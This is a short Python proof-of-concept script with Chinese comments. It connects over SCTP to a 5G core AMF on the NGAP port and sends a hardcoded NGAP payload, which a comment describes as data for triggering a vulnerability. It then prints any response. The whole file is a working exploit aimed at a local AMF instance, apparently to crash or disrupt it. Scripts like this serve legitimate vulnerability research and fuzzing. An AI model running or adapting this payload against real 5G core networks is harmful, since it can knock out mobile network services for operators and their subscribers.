import socket
import sctp
from socket import htonl

# 常量配置
AMF_IP = "127.0.0.18"
RAN_IP = "127.0.0.18"
AMF_PORT = 38412
RAN_PORT = 9497

def connect_to_amf(amf_ip, ran_ip, amf_port, ran_port):
    """建立 SCTP 连接"""
    conn = None
    try:
        conn = sctp.sctpsocket_tcp(socket.AF_INET)
        conn.bind((ran_ip, ran_port))
        print(f"尝试连接 AMF: {amf_ip}:{amf_port}")
        conn.connect((amf_ip, amf_port))
        print("连接成功")
    except Exception as e:
        print(f"连接失败: {e}")
    return conn

def send_ngap_message(conn):
    """发送并接收 NGAP 消息"""
    if not conn:
        print("无法发送NGAP消息，SCTP连接未建立")
        return
    try:
        # 这里使用触发漏洞用的NGAP数据
        ngap_data = bytes.fromhex(
            "000f0035000007007940058000000000005b40013800264003001234000300020040df554005c0ffffffff00ab40010000554005c0ffffffff"
        )
        conn.sctp_send(ngap_data, ppid=htonl(60))
        print("NGAP 消息已发送")
        # 接收响应
        conn.settimeout(0.01)
        try:
            recv_msg = conn.recv(2048)
            if recv_msg:
                print("成功接收 AMF 响应")
                print(recv_msg) 
            else:
                print("未收到任何响应")
        except socket.timeout:
            print("发送或接收NGAP消息失败")
    finally:
        conn.close()
        print("连接已关闭")

def main():
    conn = connect_to_amf(AMF_IP, RAN_IP, AMF_PORT, RAN_PORT)
    send_ngap_message(conn)

if __name__ == "__main__":
    main()
